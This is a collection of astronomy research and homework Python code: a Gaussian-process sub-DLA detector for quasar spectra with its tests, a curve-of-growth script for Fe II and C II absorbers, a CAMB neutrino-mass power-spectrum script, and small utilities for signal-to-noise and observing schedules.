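The velocity cuts are stored as redshift offsets through `kms_to_z`, i.e. Δz = v / c with v converted to m s⁻¹. A quick worked example; the import path assumes the installed package layout `gpy_dla_detection/`.
```python
# sketch: the 3000 km/s cut expressed as a redshift offset
from gpy_dla_detection.set_parameters import Parameters

delta_z = Parameters.kms_to_z(3000.0)   # (3000 * 1000 m/s) / c
print(delta_z)                          # ~0.010007, dimensionless

params = Parameters()
assert params.max_z_cut == delta_z      # default max_z_cut is 3000 km/s
```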
#### File: gpy_dla_detection/gpy_dla_detection/subdla_gp.py
```python
from typing import Tuple, Optional
import numpy as np
import h5py
from .set_parameters import Parameters
from .model_priors import PriorCatalog
from .null_gp import NullGP
from .voigt import voigt_absorption
# this could be replaced to SubDLASamples in the future;
# I import this is for the convenient of my autocomplete
from .subdla_samples import SubDLASamplesMAT
class SubDLAGP(NullGP):
"""
SubDLA GP model for QSO emission + DLA intervening:
p(y | λ, σ², M, ω, c₀, τ₀, β, τ_kim, β_kim, z_dla, logNHI)
additional two parameters (z_dla, logNHI) will control the position
and the strength of the absorption intervening on the QSO emission.
SubDLA parameter prior : logNHI ~ U(19.5, 20)
    Since the integration is not tractable, we use QMC to approximate
    the model evidence.
    The number of QMC samples is defined in Parameters and DLASamples.
    :param rest_wavelengths: λ, the rest-frame wavelength grid on which the GP models the QSO emission
:param mu: mu, the mean model of the GP.
:param M: M, the low rank decomposition of the covariance kernel: K = MM^T.
:param log_omega: log ω, the pixel-wise noise of the model. Used to model absorption noise.
:param log_c_0: log c₀, the constant in the Lyman forest noise model,
Lyman forest noise := s(z) = 1 - exp(-effective_optical_depth) + c_0.
:param log_tau_0: log τ₀, the scale factor of effective optical depth in the absorption noise,
    effective_optical_depth := ∑_i τ₀ f_{i1} λ_{i1} / ( f_{21} λ_{21} ) * ( 1 + z_{i1} )^β
:param log_beta: log β, the exponent of the effective optical depth in the absorption noise.
:param prev_tau_0: τ_kim, the scale factor of effective optical depth used in mean-flux suppression.
:param prev_beta: β_kim, the exponent of the effective optical depth used in mean-flux suppression.
Future: MCMC embedded in the class as an instance method.
"""
def __init__(
self,
params: Parameters,
prior: PriorCatalog,
dla_samples: SubDLASamplesMAT,
rest_wavelengths: np.ndarray,
mu: np.ndarray,
M: np.ndarray,
log_omega: np.ndarray,
log_c_0: float,
log_tau_0: float,
log_beta: float,
prev_tau_0: float = 0.0023,
prev_beta: float = 3.65,
min_z_separation: float = 3000.0,
broadening: bool = True,
):
super().__init__(
params,
prior,
rest_wavelengths,
mu,
M,
log_omega,
log_c_0,
log_tau_0,
log_beta,
prev_tau_0,
prev_beta,
)
self.min_z_separation = self.params.kms_to_z(min_z_separation)
self.dla_samples = dla_samples
self.broadening = broadening
def log_model_evidences(self, max_dlas: int = 1) -> np.ndarray:
"""
marginalize out the DLA parameters, {(z_dla_i, logNHI_i)}_{i=1}^k_dlas,
and return an array of log_model_evidences for 1:k DLA models
        Note: we provide an integration method here to reproduce the functionality
        of Ho-Bird-Garnett's code, but we encourage users to implement a more
        efficient sampling scheme in an external script by calling
        self.sample_log_likelihood_k_dlas directly.
:param max_dlas: the number of DLAs we want to marginalise
:return: [P(D | 1 DLA), ..., P(D | k DLAs)]
"""
# allocate the final log model evidences
log_likelihoods_dla = np.empty((max_dlas,))
log_likelihoods_dla[:] = np.nan
        # base inds to store the QMC samples to be resampled according to
        # the prior, which is the posterior of the previous run.
base_sample_inds = np.zeros(
(max_dlas - 1, self.params.num_dla_samples,), dtype=np.int32
)
        # follow the convention of the MATLAB code here; the shape
        # could be changed to (max_dlas, num_dla_samples) in the future.
sample_log_likelihoods = np.empty((self.params.num_dla_samples, max_dlas))
sample_log_likelihoods[:] = np.nan
# prepare z_dla samples
sample_z_dlas = self.dla_samples.sample_z_lls(
self.this_wavelengths, self.z_qso
)
# compute probabilities under DLA model for each of the sampled
# (normalized offset, log(N HI)) pairs
for num_dlas in range(max_dlas): # count from zero to max_dlas - 1
            # [Needs to be parallelized]
            # Roman's code parallelizes this part.
for i in range(self.params.num_dla_samples):
# query the 1st DLA parameter {z_dla, logNHI}_{i=1} from the
# given DLA samples.
z_dlas = np.array([sample_z_dlas[i]])
log_nhis = np.array([self.dla_samples.log_nhi_samples[i]])
nhis = np.array([self.dla_samples.nhi_samples[i]])
# query the 2:k DLA parameters {z_dla, logNHI}_{i=2}^k_dlas
if num_dlas > 0:
base_ind = base_sample_inds[:num_dlas, i]
z_dlas_2_k = sample_z_dlas[base_ind]
log_nhis_2_k = self.dla_samples.log_nhi_samples[base_ind]
nhis_2_k = self.dla_samples.nhi_samples[base_ind]
                    # append to the samples used for calculating the log likelihood
z_dlas = np.append(z_dlas, z_dlas_2_k)
log_nhis = np.append(log_nhis, log_nhis_2_k)
nhis = np.append(nhis, nhis_2_k)
del z_dlas_2_k, log_nhis_2_k, nhis_2_k
# store the sample log likelihoods conditioned on k-DLAs
sample_log_likelihoods[i, num_dlas] = self.sample_log_likelihood_k_dlas(
z_dlas, nhis
) - np.log(
self.params.num_dla_samples
) # additional occams razor
            # check if any pair of DLAs in this sample is too close; this has to
            # happen outside the parfor because "continue" slows things down
            # dramatically
if num_dlas > 0:
# all_z_dlas : (num_dlas, num_dla_samples)
ind = base_sample_inds[:num_dlas, :] # (num_dlas - 1, num_dla_samples)
all_z_dlas = np.concatenate(
[sample_z_dlas[None, :], sample_z_dlas[ind]], axis=0
) # (num_dlas, num_dla_samples)
ind = np.any(
np.diff(np.sort(all_z_dlas, axis=0), axis=0)
< self.min_z_separation,
axis=0,
)
sample_log_likelihoods[ind, num_dlas] = np.nan
# to prevent numerical underflow
max_log_likelihood = np.nanmax(sample_log_likelihoods[:, num_dlas])
sample_probabilities = np.exp(
sample_log_likelihoods[:, num_dlas] - max_log_likelihood
)
log_likelihoods_dla[num_dlas] = (
max_log_likelihood
+ np.log(np.nanmean(sample_probabilities))
- np.log(self.params.num_dla_samples) * num_dlas
) # occams razor for more DLA parameters
            # no need to re-sample the QMC samples for the last run
if (num_dlas + 1) == max_dlas:
break
            # if p(D | z_QSO, k DLAs) is NaN, finish the loop early.
            # This usually happens because p(D | z_QSO, no DLA) is very high, so
            # the higher-order DLA model likelihoods have already underflowed.
if np.isnan(log_likelihoods_dla[num_dlas]):
print(
"Finish the loop earlier because NaN value in log p(D | z_QSO, {} DLAs)".format(
num_dlas
)
)
break
# avoid nan values in the randsample weights
nanind = np.isnan(sample_probabilities)
W = sample_probabilities
W[nanind] = 0.0
base_sample_inds[num_dlas, :] = np.random.choice(
np.arange(self.params.num_dla_samples).astype(np.int32),
size=self.params.num_dla_samples,
replace=True,
p=W / W.sum(),
)
# store sample likelihoods for MAP value calculation
# this could cause troubles for parallelization in the future
self.sample_log_likelihoods = sample_log_likelihoods
return log_likelihoods_dla
def sample_log_likelihood_k_dlas(
self, z_dlas: np.ndarray, nhis: np.ndarray
) -> float:
"""
Compute the log likelihood of k DLAs within a quasar spectrum:
p(y | λ, σ², M, ω, c₀, τ₀, β, τ_kim, β_kim, {z_dla, logNHI}_{i=1}^k)
:param z_dlas: an array of z_dlas you want to condition on
:param nhis: an array of nhis you want to condition on
"""
assert len(z_dlas) == len(nhis)
dla_mu, dla_M, dla_omega2 = self.this_dla_gp(z_dlas, nhis)
sample_log_likelihood = self.log_mvnpdf_low_rank(
self.y, dla_mu, dla_M, dla_omega2 + self.v
)
return sample_log_likelihood
def this_dla_gp(
self, z_dlas: np.ndarray, nhis: np.ndarray
) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
"""
Compute the DLA GP model with k intervening DLA profiles onto
the mean and covariance.
:param z_dlas: (k_dlas, ), the redshifts of intervening DLAs
:param nhis: (k_dlas, ), the column densities of intervening DLAs
:return: (dla_mu, dla_M, dla_omega2)
:return dla_mu: (n_points, ), the GP mean model with k_dlas DLAs intervening.
:return dla_M: (n_points, k), the GP covariance with k_dlas DLAs intervening.
        :return dla_omega2: (n_points, ), the absorption noise with k_dlas DLAs intervening.
        Note: the number of Voigt profile lines is controlled by self.params : Parameters.
        We prefer not to expose it as a function argument since that could easily cause
        inconsistencies within a pipeline. If a user wants to change num_lines, they can
        do so by changing the instance attribute of self.params : Parameters, like:
            self.params.num_lines = <the number of lines preferred to be used>
        This is useful when a user wants to check whether the result converges with an
        increasing number of lines.
"""
assert len(z_dlas) == len(nhis)
k_dlas = len(z_dlas)
# to retain only unmasked pixels from computed absorption profile
mask_ind = ~self.pixel_mask[self.ind_unmasked]
# [broadening] use the padded wavelengths for convolution;
# otherwise, should use unmasked wavelengths.
if self.broadening:
wavelengths = self.padded_wavelengths
else:
wavelengths = self.unmasked_wavelengths
# absorption corresponding to this sample
absorption = voigt_absorption(
wavelengths,
z_dla=z_dlas[0],
nhi=nhis[0],
num_lines=self.params.num_lines,
broadening=self.broadening, # the switch for instrumental broadening controlled by instance attr
)
# absorption corresponding to other DLAs in multiple DLA samples
for j in range(1, k_dlas):
absorption = absorption * voigt_absorption(
wavelengths,
z_dla=z_dlas[j],
nhi=nhis[j],
num_lines=self.params.num_lines,
broadening=self.broadening, # the switch for instrumental broadening controlled by instance attr
)
absorption = absorption[mask_ind]
assert len(absorption) == len(self.this_mu)
dla_mu = self.this_mu * absorption
dla_M = self.this_M * absorption[:, None]
dla_omega2 = self.this_omega2 * absorption ** 2
return dla_mu, dla_M, dla_omega2
def log_priors(self, z_qso: float, max_dlas: int) -> float:
"""
        get the model priors for the k-DLA models; these are defined to be:
P(k DLA | zQSO) = P(at least k DLAs | zQSO) - P(at least (k + 1) DLAs | zQSO),
where
P(at least 1 DLA | zQSO) = M / N
M : number of DLAs below this zQSO
N : number of quasars below this zQSO
and
P(at least k DLA | zQSO) = (M / N)^k
For subDLAs, we need to adjust the model prior with the ratio
of the normalization factors:
        P(at least 1 subDLA | zQSO) = Z_lls / Z_dla * P(at least 1 DLA | zQSO)
                                    = Z_lls / Z_dla * M / N
"""
this_num_dlas, this_num_quasars = self.prior.less_ind(z_qso)
p_dlas = (
self.dla_samples._Z_lls
/ self.dla_samples._Z_dla
* (this_num_dlas / this_num_quasars) ** np.arange(1, max_dlas + 1)
)
for i in range(max_dlas - 1):
p_dlas[i] = p_dlas[i] - p_dlas[i + 1]
log_priors_dla = np.log(p_dlas)
return log_priors_dla
class SubDLAGPMAT(SubDLAGP):
"""
    Load the learned model from a .mat file.
    The learned file is the same as for DLAGP;
    the sample file is different.
"""
def __init__(
self,
params: Parameters,
prior: PriorCatalog,
dla_samples: SubDLASamplesMAT,
min_z_separation: float = 3000.0,
learned_file: str = "learned_qso_model_lyseries_variance_kim_dr9q_minus_concordance.mat",
broadening: bool = True,
):
with h5py.File(learned_file, "r") as learned:
rest_wavelengths = learned["rest_wavelengths"][:, 0]
mu = learned["mu"][:, 0]
M = learned["M"][()].T
log_omega = learned["log_omega"][:, 0]
log_c_0 = learned["log_c_0"][0, 0]
log_tau_0 = learned["log_tau_0"][0, 0]
log_beta = learned["log_beta"][0, 0]
super().__init__(
params,
prior,
dla_samples,
rest_wavelengths,
mu,
M,
log_omega,
log_c_0,
log_tau_0,
log_beta,
prev_tau_0=0.0023,
prev_beta=3.65,
min_z_separation=min_z_separation,
broadening=broadening,
)
```
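The evidence computation in `log_model_evidences` above guards against numerical underflow by subtracting the per-model maximum log likelihood before exponentiating, then adding it back after averaging. A self-contained sketch of just that step, with made-up numbers (not tied to the classes above):

```python
import numpy as np

# Toy per-sample log likelihoods for one k-DLA model (illustrative values only);
# NaN marks a sample rejected because two z_DLAs were closer than min_z_separation.
sample_log_likelihoods = np.array([-1200.0, -1195.0, -1210.0, np.nan])

# exp() of such large negative numbers would underflow to zero, so shift by the max first.
max_log_likelihood = np.nanmax(sample_log_likelihoods)
sample_probabilities = np.exp(sample_log_likelihoods - max_log_likelihood)

# log of the QMC mean, shifted back; NaN entries are ignored by nanmean.
log_evidence = max_log_likelihood + np.log(np.nanmean(sample_probabilities))
print(log_evidence)  # ~ -1196.1
```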
#### File: gpy_dla_detection/tests/test_map.py
```python
import time
import numpy as np
from .test_model import prepare_dla_model
def test_DLA_MAP():
# test 1
dla_gp = prepare_dla_model(plate=5309, mjd=55929, fiber_id=362, z_qso=3.166)
tic = time.time()
max_dlas = 4
log_likelihoods_dla = dla_gp.log_model_evidences(max_dlas)
toc = time.time()
    # very time consuming: ~ 4 mins for a single spectrum without parallelization.
print("spent {} mins; {} seconds".format((toc - tic) // 60, (toc - tic) % 60))
catalog_MAP_log_nhis = np.array(
[
[22.28420156, np.nan, np.nan, np.nan],
[20.63417494, 22.28420156, np.nan, np.nan],
[20.60601572, 22.28420156, 20.63417494, np.nan],
[20.12721363, 22.28420156, 20.63417494, 20.36967609],
]
)
catalog_MAP_z_dlas = np.array(
[
[3.03175723, np.nan, np.nan, np.nan],
[2.52182382, 3.03175723, np.nan, np.nan],
[2.39393537, 3.03175723, 2.52182382, np.nan],
[2.94786938, 3.03175723, 2.52182382, 2.38944805],
]
)
mapind = np.nanargmax(log_likelihoods_dla)
MAP_z_dla, MAP_log_nhi = dla_gp.maximum_a_posteriori()
nanind = np.isnan(catalog_MAP_z_dlas[mapind])
assert np.all(
np.abs(MAP_z_dla[mapind][~nanind] - catalog_MAP_z_dlas[mapind][~nanind]) < 1e-1
)
assert np.all(
np.abs(MAP_log_nhi[mapind][~nanind] - catalog_MAP_log_nhis[mapind][~nanind])
< 1e-1
)
# test 2
dla_gp = prepare_dla_model(plate=3816, mjd=55272, fiber_id=76, z_qso=3.68457627)
tic = time.time()
max_dlas = 4
log_likelihoods_dla = dla_gp.log_model_evidences(max_dlas)
toc = time.time()
    # very time consuming: ~ 4 mins for a single spectrum without parallelization.
print("spent {} mins; {} seconds".format((toc - tic) // 60, (toc - tic) % 60))
catalog_MAP_log_nhis = np.array(
[
[21.05371292, np.nan, np.nan, np.nan],
[20.0073665, 20.94707037, np.nan, np.nan],
[20.00838815, 20.94707037, 20.0073665, np.nan],
[20.20539934, 20.94707037, 20.0073665, 20.0134955],
]
)
catalog_MAP_z_dlas = np.array(
[
[3.42520566, np.nan, np.nan, np.nan],
[2.69422714, 3.42710284, np.nan, np.nan],
[3.41452521, 3.42710284, 2.69422714, np.nan],
[3.43813463, 3.42710284, 2.69422714, 3.41262802],
]
)
mapind = np.nanargmax(log_likelihoods_dla)
MAP_z_dla, MAP_log_nhi = dla_gp.maximum_a_posteriori()
nanind = np.isnan(catalog_MAP_z_dlas[mapind])
assert np.all(
np.abs(MAP_z_dla[mapind][~nanind] - catalog_MAP_z_dlas[mapind][~nanind]) < 1e-1
)
assert np.all(
np.abs(MAP_log_nhi[mapind][~nanind] - catalog_MAP_log_nhis[mapind][~nanind])
< 1e-1
)
```
#### File: gpy_dla_detection/tests/test_read_spec.py
```python
import os
from gpy_dla_detection.read_spec import read_spec, retrieve_raw_spec
import numpy as np
def test_read_spec():
if not os.path.exists("spec-7340-56825-0576.fits"):
retrieve_raw_spec(7340, 56825, 576) # an arbitrary spectrum
wavelengths, flux, noise_variance, pixel_mask = read_spec(
"spec-7340-56825-0576.fits"
)
assert min(wavelengths) > 1216
assert len(flux) == len(noise_variance)
assert type(pixel_mask[0]) is np.bool_
```
#### File: gpy_dla_detection/tests/test_voigt.py
```python
import numpy as np
from gpy_dla_detection.voigt import voigt_absorption, instrument_profile, width
def test_instrumental_broadening():
# test 1
z_qso = 3.15
wavelengths = np.linspace(911, 1216, 1000) * (1 + z_qso)
z_dla = 3.1
nhi = 10 ** 20.3
raw_profile = voigt_absorption(
wavelengths, nhi, z_dla, num_lines=3, broadening=False
)
# the convolution written in Roman's code
profile = np.zeros((wavelengths.shape[0] - 2 * width,))
num_points = len(profile)
# instrumental broadening
for i in range(num_points):
for k, j in enumerate(range(i, i + 2 * width + 1)):
profile[i] += raw_profile[j] * instrument_profile[k]
# numpy native convolution
profile_numpy = np.convolve(raw_profile, instrument_profile, "valid")
assert np.all(np.abs(profile - profile_numpy) < 1e-4)
# test 2
z_qso = 5
wavelengths = np.linspace(911, 1216) * (1 + z_qso)
z_dla = 4.5
nhi = 10 ** 21
raw_profile = voigt_absorption(
wavelengths, nhi, z_dla, num_lines=5, broadening=False
)
# the convolution written in Roman's code
profile = np.zeros((wavelengths.shape[0] - 2 * width,))
num_points = len(profile)
# instrumental broadening
for i in range(num_points):
for k, j in enumerate(range(i, i + 2 * width + 1)):
profile[i] += raw_profile[j] * instrument_profile[k]
# numpy native convolution
profile_numpy = np.convolve(raw_profile, instrument_profile, "valid")
assert np.all(np.abs(profile - profile_numpy) < 1e-4)
```
#### File: gpy_dla_detection/tests/test_zestimation.py
```python
import os
import re
import time
import numpy as np
from .test_selection import filenames, z_qsos
from gpy_dla_detection.read_spec import read_spec, retrieve_raw_spec
from gpy_dla_detection.zqso_set_parameters import ZParameters
from gpy_dla_detection.zqso_samples import ZSamples
from gpy_dla_detection.zqso_gp import ZGPMAT
def test_zestimation(nspec: int):
filename = filenames[nspec]
if not os.path.exists(filename):
plate, mjd, fiber_id = re.findall(
r"spec-([0-9]+)-([0-9]+)-([0-9]+).fits", filename,
)[0]
retrieve_raw_spec(int(plate), int(mjd), int(fiber_id))
params = ZParameters()
z_qso_samples = ZSamples(params)
wavelengths, flux, noise_variance, pixel_mask = read_spec(filename)
z_qso_gp = ZGPMAT(
params,
z_qso_samples,
learned_file="data/dr12q/processed/learned_zqso_only_model_outdata_full_dr9q_minus_concordance_norm_1176-1256.mat",
)
tic = time.time()
z_qso_gp.inference_z_qso(wavelengths, flux, noise_variance, pixel_mask)
print("Z True : {:.3g}".format(z_qsos[nspec]))
toc = time.time()
print("spent {} mins; {} seconds".format((toc - tic) // 60, (toc - tic) % 60))
return z_qso_gp.z_map, z_qsos[nspec]
def test_batch(num_quasars: int = 100):
all_z_diffs = np.zeros((num_quasars,))
for nspec in range(num_quasars):
z_map, z_true = test_zestimation(nspec)
z_diff = z_map - z_true
print("[Info] z_diff = z_map - z_true = {:.8g}".format(z_diff))
all_z_diffs[nspec] = z_diff
print("[Info] abs(z_diff) < 0.5 = {:.4g}".format(accuracy(all_z_diffs, 0.5)))
print("[Info] abs(z_diff) < 0.05 = {:.4g}".format(accuracy(all_z_diffs, 0.05)))
# we got ~99% accuracy in https://arxiv.org/abs/2006.07343
# so at least we need to ensure ~98% here
assert accuracy(all_z_diffs, 0.5) > 0.98
def accuracy(z_diff: np.ndarray, z_thresh: float):
num_quasars = z_diff.shape[0]
corrects = (np.abs(z_diff) < z_thresh).sum()
return corrects / num_quasars
``` |
{
"source": "jibanCat/homework_helper",
"score": 4
} |
#### File: homework_helper/homework_helper/tex_reader.py
```python
import re
def load_tex(filepath):
'''
Loading a .tex file from disk as a string.
'''
with open(filepath, 'r') as file:
tex = file.read()
return tex.encode("unicode_escape").decode(
).replace("\\\\", "\\").replace(r"\n", r" ")
def equation_pattern():
'''
    Generate a regex pattern for LaTeX equations.
'''
# TODO: parse labels in the equation.
pattern = re.compile(r"\\begin{equation}(.+?)\\end{equation}")
return pattern
def parse_equations(tex):
'''
From tex to a list of equations.
'''
    # minimal implementation: return the body of every equation environment
    pattern = equation_pattern()
    return [eq.strip() for eq in pattern.findall(tex)]
``` |
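A short usage sketch for the helpers above; the sample string is illustrative, and the pattern is re-declared inline so the snippet runs on its own:

```python
import re

# Same pattern as equation_pattern(); note that load_tex() flattens newlines,
# so a non-DOTALL pattern is enough to match equation bodies.
pattern = re.compile(r"\\begin{equation}(.+?)\\end{equation}")

tex = r"Intro text \begin{equation} E = mc^2 \end{equation} and also " \
      r"\begin{equation} F = ma \end{equation}"

equations = [eq.strip() for eq in pattern.findall(tex)]
print(equations)  # ['E = mc^2', 'F = ma']
```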
{
"source": "jibanCat/ISM_homework",
"score": 2
} |
#### File: ISM_homework/hw4/absorbers.py
```python
import numpy as np
from matplotlib import pyplot as plt
from matplotlib import cm
# get gradient from cmap colors
cmap = cm.get_cmap("viridis")
# redshift
z = 2
save_figure = lambda filename : plt.savefig(filename, dpi=300, format="pdf")
class Ion:
# cgs units
c = 3 * 10**10
def __init__(self, lrest, f, gamma, Wlrest):
self.lrest = lrest
self.f = f
self.gamma = gamma
self.Wlrest = Wlrest
self.W = self.Wl2W(Wlrest, lrest)
@staticmethod
def Wl2W(Wl, l):
return Wl / l
@staticmethod
def tau_0(f, l, b, N):
'''
in cgs
'''
return 1.497e-2 * f * l / b * N
def approx_W_small(self, b, tau_0):
'''
Approximated W if tau_0 < 1.25393
'''
W = np.sqrt(np.pi) * b / self.c * tau_0 / (1 + tau_0 / (2 * np.sqrt(2)))
return W
def approx_W_large(self, b, tau_0):
'''
Approximated W if tau_0 > 1.25393
'''
term_ln_tau = (2 * b / self.c)**2 * np.log(tau_0 / np.log(2))
term_gamma = b / self.c * self.gamma * self.lrest / self.c * (tau_0 - 1.25393) / np.sqrt(2)
return np.sqrt( term_ln_tau + term_gamma )
def calc_W(self, N, b):
'''
calc W based on given N and b.
N (array)
b (float)
'''
tau_0 = self.tau_0(
self.f, self.lrest, b, N
)
ind = tau_0 >= 1.25393
W = np.empty(ind.shape)
W_small = self.approx_W_small(b, tau_0)
W_large = self.approx_W_large(b, tau_0)
W[ ind] = W_large[ind]
W[~ind] = W_small[~ind]
return W
def do_loglog_plot(ion, N, all_b):
'''
Plotting for C.O.G in 1(a)
'''
# plot for different bs
for i,b in enumerate(all_b):
W = ion.calc_W(N, b)
plt.loglog(N, W, label="b = {} km/s".format(b / 10**5), color=cmap(i / len(all_b)))
plt.xlabel(r"$N_{\ell}$")
plt.ylabel(r"$W$")
plt.legend()
def do_loglog_plot_Wlambda(ion, N, all_b):
'''
Plotting for C.O.G in 1(a)
'''
# plot for different bs
for i,b in enumerate(all_b):
W = ion.calc_W(N, b)
Wl = W * ion.lrest * 10**8 # A
plt.loglog(N, Wl, label="b = {} km/s".format(b / 10**5), color=cmap(i / len(all_b)))
plt.xlabel(r"$N_{\ell}$")
plt.ylabel(r"$W^{\mathrm{rest}}_\lambda$ $\AA$")
plt.legend()
# provided by the question
all_b = np.array([1, 2, 3, 5, 10]) * 10**5 # cm/s
log_NFe = np.linspace(12, 16, 100)
log_NC = np.linspace(13, 17, 100)
# unit convert
NFe = 10**( log_NFe ) # cm^-2
NC = 10**( log_NC ) # cm^-2
ion_fe_1 = Ion(2382.7642 * 10**-8, 0.32, 3.13e8, 0.051)
ion_fe_2 = Ion(2249.8768 * 10**-8, 0.00182, 3.31e8, 0.0047)
ion_c = Ion(1334.5323 * 10**-8, 0.12780, 2.880e8, 0.060)
# 1(a) do plots
do_loglog_plot(ion_fe_1, NFe, all_b); save_figure("images/W_N_Fe_II_1.pdf"); plt.clf()
do_loglog_plot(ion_fe_2, NFe, all_b); save_figure("images/W_N_Fe_II_2.pdf"); plt.clf()
do_loglog_plot(ion_c, NC, all_b); save_figure( "images/W_N_C_II.pdf"); plt.clf()
do_loglog_plot_Wlambda(ion_fe_1, NFe, all_b)
plt.hlines(ion_fe_1.Wlrest, min(NFe), max(NFe))
save_figure("images/Wl_N_Fe_II_1.pdf"); plt.clf()
do_loglog_plot_Wlambda(ion_fe_2, NFe, all_b)
plt.hlines(ion_fe_2.Wlrest, min(NFe), max(NFe))
save_figure("images/Wl_N_Fe_II_2.pdf"); plt.clf()
do_loglog_plot_Wlambda(ion_c, NC, all_b)
plt.hlines(ion_c.Wlrest, min(NC), max(NC))
save_figure("images/Wl_N_C_II.pdf"); plt.clf()
# 1(b)
dv_Fe_1 = 2 * np.sqrt(np.log(2)) * 1.5
print("(dv)FeII_1 = {};".format(dv_Fe_1))
print("(dv)FeII_obs_1 = {};".format(dv_Fe_1 * (1 + z)))
# 1(d) thermal broadening
calc_T = lambda M_mH, dv : 1/2.15**2 * M_mH * dv**2 * 100
T_Fe_1 = calc_T(56, 2.5)
print("At least T for Fe II {}.".format(
T_Fe_1
))
# 1(e)
Mfe = 56
MC = 12
b_fe = 2.5
b_C = np.sqrt(Mfe / MC) * b_fe
print("b for CII by thermal: {}".format(b_C))
do_loglog_plot_Wlambda(ion_fe_1, NFe, all_b)
plt.hlines(ion_fe_1.Wlrest, min(NFe), max(NFe))
save_figure("images/Wl_N_Fe_II_1_more_b.pdf"); plt.clf()
``` |
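A small numeric sketch of the regime switch inside `calc_W` above: for τ₀ below ≈ 1.25393 the linear-regime approximation is used, above it the flat/damped one. The line parameters are the Fe II 2382 Å values from the script; the column densities are illustrative:

```python
import numpy as np

c = 3e10                                        # speed of light, cm/s
f, lrest, gamma = 0.32, 2382.7642e-8, 3.13e8    # Fe II 2382 line (as in the script)
b = 5e5                                         # Doppler parameter, 5 km/s in cm/s

tau_0 = lambda N: 1.497e-2 * f * lrest / b * N  # same expression as Ion.tau_0

for N in (1e12, 1e15):                          # column densities on either side of the switch
    t0 = tau_0(N)
    if t0 < 1.25393:                            # linear part of the curve of growth
        W = np.sqrt(np.pi) * b / c * t0 / (1 + t0 / (2 * np.sqrt(2)))
    else:                                       # flat/damped part
        W = np.sqrt((2 * b / c) ** 2 * np.log(t0 / np.log(2))
                    + b / c * gamma * lrest / c * (t0 - 1.25393) / np.sqrt(2))
    print("N = {:.1e}, tau_0 = {:.3g}, W = {:.3g}".format(N, t0, W))
```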
{
"source": "jibanCat/phys214_obsastro",
"score": 3
} |
#### File: phys214_obsastro/cosmos_hw/camb_change_neutrino.py
```python
import numpy as np
import camb
from matplotlib import pyplot as plt
from matplotlib.cm import get_cmap
viridis = get_cmap("viridis")
def change_neutrino(mnu):
'''
mnu : neutrino mass (eV)
other params set to Planck 2018 results
'''
# setup six init params from the paper
params = camb.CAMBparams() # the obj stores params
params.set_cosmology(
H0=67.4, ombh2=0.022383,
omch2=0.122011, omk=0, tau=0.0543,
mnu=mnu, neutrino_hierarchy='degenerate')
params.InitPower.set_params(
As=np.exp(3.0448) * 1e-10, ns=0.96605)
params.set_for_lmax(2500, lens_potential_accuracy=0)
# calculate the results of params
results = camb.get_results(
params)
# get power spec
power_spec = results.get_cmb_power_spectra(
params, CMB_unit="muK", lmax=2500)
return power_spec
# vary the (degenerate) neutrino mass m_nu while keeping the other Planck 2018 parameters fixed
fig, ax = plt.subplots(1, 1, figsize = (10, 6))
for i in range(11):
mnu = 0 + i * 0.1
power_spec = change_neutrino(mnu)
total_cls = power_spec['total']
unlensed_total_cls = power_spec['unlensed_scalar']
ls = np.arange(total_cls.shape[0])
ax.plot(ls, unlensed_total_cls[:, 0] ,
color=viridis( i / 11), label=r'$m_\nu = {:.1g}$'.format(mnu))
ax.set_title(r'Change $m_\nu$')
ax.set_xlim(0, 2500)
ax.set_xlabel(r'$\ell$')
ax.set_ylabel(r'$\mathcal{D}^{TT}_\ell$ [$\mu K^2$]')
ax.legend()
plt.savefig("images/change_neutrino.png", format='png', dpi=200)
plt.show()
```
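A brief indexing sketch for the spectra returned by `change_neutrino` above. It assumes CAMB's usual `get_cmb_power_spectra` convention that each entry is an array with columns (TT, EE, BB, TE); run it after the function definition in the script:

```python
import numpy as np

power_spec = change_neutrino(mnu=0.06)       # roughly the minimal-mass normal-hierarchy value
unlensed = power_spec['unlensed_scalar']     # shape (lmax + 1, 4): columns TT, EE, BB, TE
ls = np.arange(unlensed.shape[0])
tt = unlensed[:, 0]                          # D_ell^TT in muK^2 (CMB_unit="muK" above)
print(ls[2], tt[2])                          # entries below ell = 2 are zero by convention
```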
#### File: hw1/signal/calculator.py
```python
import math as m
import sympy as sp
t = sp.symbols("t")
# S/N ratio equation
sn = lambda R_s, R_sky, RN, DN, npix, t : R_s * t / ( R_s * t + R_sky * t * npix + RN**2 * npix + DN * t * npix )**(1/2)
def solve_SN_20(R_s, R_sky, RN, DN, npix, t):
'''
Parameters
----
R_s : float, e/s from source
R_sky : float, e/s/pix from sky
RN : float, sqrt(e/s/pix) readout noise
DN : float, e/s dark current noise
npix : int, number of pixels
t : sympy.symbol, time to solve
Return:
t_20 : the time for S/N reach 20
'''
expr = sn(R_s, R_sky, RN**(1/2), DN, npix, t)
return sp.solve(sp.Eq(expr, 20), t)[0]
```
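A usage sketch for the S/N helpers above, with made-up instrument numbers that only demonstrate the call signatures (none of them come from the assignment):

```python
import sympy as sp

# Evaluate the S/N expression directly for an illustrative 60 s exposure:
# 50 e/s from the source, 5 e/s/pix from sky, RN = 10 (so RN**2 = 100), DN = 0.1 e/s, 9 pixels.
snr = sn(R_s=50.0, R_sky=5.0, RN=10.0, DN=0.1, npix=9, t=60.0)
print(snr)  # ~ 37 for these numbers

# Solve for the exposure time at which S/N reaches 20; t must be a sympy symbol.
# Note that solve_SN_20 passes RN**(1/2) into sn, following its docstring convention.
t = sp.symbols("t", positive=True)
t_20 = solve_SN_20(R_s=50.0, R_sky=5.0, RN=10.0, DN=0.1, npix=9, t=t)
print(t_20)
```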
#### File: phys214_obsastro/hw2/generate_observation_run.py
```python
from starlist.calc_time import LT2LMST
from datetime import date, datetime, timedelta
# set parameters
init_year = 2020
init_month = 3
init_day = 22
init_hh = 18
init_mm = 0
init_ss = 0
initial_time = datetime(init_year, init_month, init_day, init_hh, init_mm, init_ss)
# increment of time
delta_mm = 10 # minutes
# end time
end_year = 2020
end_month = 3
end_day = 23
end_hh = 6
end_mm = 10
end_ss = 0
end_time = datetime(end_year, end_month, end_day, end_hh, end_mm, end_ss)
def generate_time_interval(initial_time, end_time, delta_mm):
'''
generate a list of time intervals with delta minutes
'''
for i in range( int((end_time - initial_time).seconds // 60 // delta_mm) ):
yield initial_time + timedelta(minutes=i * delta_mm)
# generate a list for schedule
local_time_list = list(generate_time_interval(initial_time, end_time, delta_mm))
local_mean_sidereal_time_list = [
LT2LMST(ls.year, ls.month, ls.day, ls.hour, ls.minute, ls.second) for ls in local_time_list
]
def generate_schedule(local_time_list, local_mean_sidereal_time_list):
'''
print the schedule, handle the format
'''
